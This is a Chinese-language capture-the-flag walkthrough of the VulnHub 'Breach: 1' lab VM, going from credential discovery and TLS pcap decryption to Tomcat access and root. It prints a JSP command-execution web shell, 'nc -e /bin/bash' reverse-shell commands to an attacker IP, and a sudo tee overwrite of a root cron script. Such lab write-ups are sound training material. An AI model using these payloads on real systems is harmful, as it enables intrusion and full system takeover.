vulnhub - BREACH: 1

vulnhub - BREACH: 1

描述

作为多部分系列中的第一部分，Breach 1.0 旨在成为初学者到中级的 boot2root/CTF 挑战。解决将需要可靠的信息收集和持久性相结合。不遗余力。

VM 配置了静态 IP 地址 (192.168.110.140)，因此您需要将主机专用适配器配置到此子网。

非常感谢 knightmare 和 rastamouse 的测试和反馈。

感谢 g0tmi1k 维护 #vulnhub 并主持我的第一个挑战。

如果您遇到任何问题，您可以在 Twitter 上找到我：https://twitter.com/mrb3n813 或在 #vulnhub 中的 IRC 上。

期待撰写文章，尤其是任何意外的本地/根路径。

环境搭建

修改此处为

修改为主机模式，kali也要改

重启后出现对应网卡配置即为设置成功

80端口利用

nmap扫描端口，发现端口全开，还是优先关注常用的端口

访问web页面，查看源码

<!DOCTYPE html>

<html>
<head>
<title>Welcome to Breach 1.0</title>
</head>

<body bgcolor="#000000">

<font color="green">
<p>Initech was breached and the board of directors voted to bring in their internal Initech Cyber Consulting, LLP division to assist. Given the high profile nature of the breach and nearly catastrophic losses, there have been many subsequent attempts against the company. Initech has tasked their TOP consultants, led by Bill Lumbergh, CISSP and Peter Gibbons, C|EH, SEC+, NET+, A+ to contain and perform analysis on the breach.</p> 

<p>Little did the company realize that the breach was not the work of skilled hackers, but a parting gift from a disgruntled former employee on his way out. The TOP consultants have been hard at work containing the breach.
However, their own work ethics and the mess left behind may be the company's downfall.</p>

<center><a href="initech.html" target="_blank"> <img src="/images/milton_beach.jpg"
width=500 height=500> </a></center>

<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

</body>
</html>

得到注释，解两次base64得到一个用户密码

pgibbons:damnitfeel$goodtobeagang$ta

还有一个链接指向192.168.110.140/initech.html，源码有注释

<!--I'm sitting on a beach reading your email! -->

点击进入Employee portal会跳转到http://192.168.110.140/impresscms/user.php

指纹探测

有登录框，尝试登入。用刚才得到的用户密码

登录成功后发现有三封邮件

来自 ImpressCMS Admin

Posting sensitive content 

Peter, yeahhh, I'm going to have to go ahead and ask you to have your team only post any sensitive artifacts to the admin portal. My password is extremely secure. If you could go ahead and tell them all that'd be great. -Bill

来自Michael Bolton

IDS/IPS system

Hey Peter,

I got a really good deal on an IDS/IPS system from a vendor I met at that happy hour at Chotchkie's last week!

-Michael

来自ImpressCMS Admin

FWD: Thank you for your purchase of Super Secret Cert Pro!

Peter, I am not sure what this is. I saved the file here: 192.168.110.140/.keystore Bob ------------------------------------------------------------------------------------------------------------------------------------------- From: registrar@penetrode.com Sent: 02 June 2016 16:16 To: bob@initech.com; admin@breach.local Subject: Thank you for your purchase of Super Secret Cert Pro! Please find attached your new SSL certificate. Do not share this with anyone!

这封提到了192.168.110.140/.keystore，结合后文提到的SSL certificate应该就是SSL证书

但是还没有地方可以导入使用，利用搜索框，输入SSL试试

SSL implementation test capture

Team - I have uploaded a pcap file of our red team's re-production of the attack. I am not sure what trickery they were using but I cannot read the file. I tried every nmap switch from my C|EH studies and just cannot figure it out. http://192.168.110.140/impresscms/_SSL_test_phase1.pcap They told me the alias, storepassword and keypassword are all set to 'tomcat'. Is that useful?? Does anyone know what this is? I guess we are securely encrypted now? -Peter p.s. I'm going fishing for the next 2 days and will not have access to email or phone.

果然搜到了一封邮件，告诉我们有一个流量包，别名、存储密码和密钥都设置为“tomcat”

列出名为 "keystore" 的密钥库中存储的证书和密钥

keytool -list -keystore keystore

keytool -importkeystore -srckeystore keystore -destkeystore keystore -deststoretype pkcs12

导入SSL证书

生成符合要求的证书，打开流量包

编辑->首选项->Protocols->TLS->RSA keys list 单击key file 添加

看了一下各个流的信息

<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>

这里拿到了一个用户密码

Authorization: Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC

解base64得到tomcat:Tt\5D8F(#!*u=G)4m7zB，应该也是一个用户密码

还有一个可疑网页https://192.168.110.140:8443/_M@nag3Me/html，要开代理抓包访问

8443端口利用

访问时要求输入用户密码

tomcat:Tt\5D8F(#!*u=G)4m7zB登录成功

指纹探测

文件上传反弹shell

看到一个文件上传点，可传war包

将shell.jsp打包成war包

<%
Runtime.getRuntime().exec(request.getParameter("shell"));
%>

shell.jsp单独放置一个目录，命令行下进入当前目录

jar -cvf Login.war shell.jsp

访问文件位置https://192.168.110.140:8443/shell/shell.jsp，有定时任务删文件，所以选择反弹shell

nc -v 192.168.110.128 8888 -e /bin/bash

开启交互

python -c 'import pty;pty.spawn("/bin/sh")'

查看/etc/passwd，关注以下两个用户

milton:x:1000:1000:Milton_Waddams,,,:/home/milton:/bin/bash
blumbergh:x:1001:1001:Bill Lumbergh,,,:/home/blumbergh:/bin/bash

再寻找一下可疑文件，在/var/www/5446下有两个php文件

查看得到了mysql的用户密码

// Database Username
// Your database user account on the host
define( 'SDATA_DB_USER', 'root' );

// Database Password
// Password for your database user account
define( 'SDATA_DB_PASS', '' );

mysql数据查询

直接登入

mysql -u root -p

查表

拿到了用户milton的密码，md5破解

得到密码 thelaststraw，登入milton却发现无法提权

$ su milton
su milton
Password: thelaststraw

milton@Breach:/var/www/5446$ sudo -l
sudo -l
[sudo] password for milton: thelaststraw

Sorry, user milton may not run sudo on Breach.

到处找痕迹。。

发现两张图片的权限有区别，下载到本机

用exiftool查看

在bill.png果然拿到了信息，尝试后发现是用户blumbergh的密码

提权

登录查看可用提权方式

找到相应提权命令

那再次反弹shell

echo nc -v 192.168.110.128 7777 -e /bin/bash | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

注意！这里不要自己立刻运行，这样会提权失败需要等它自己触发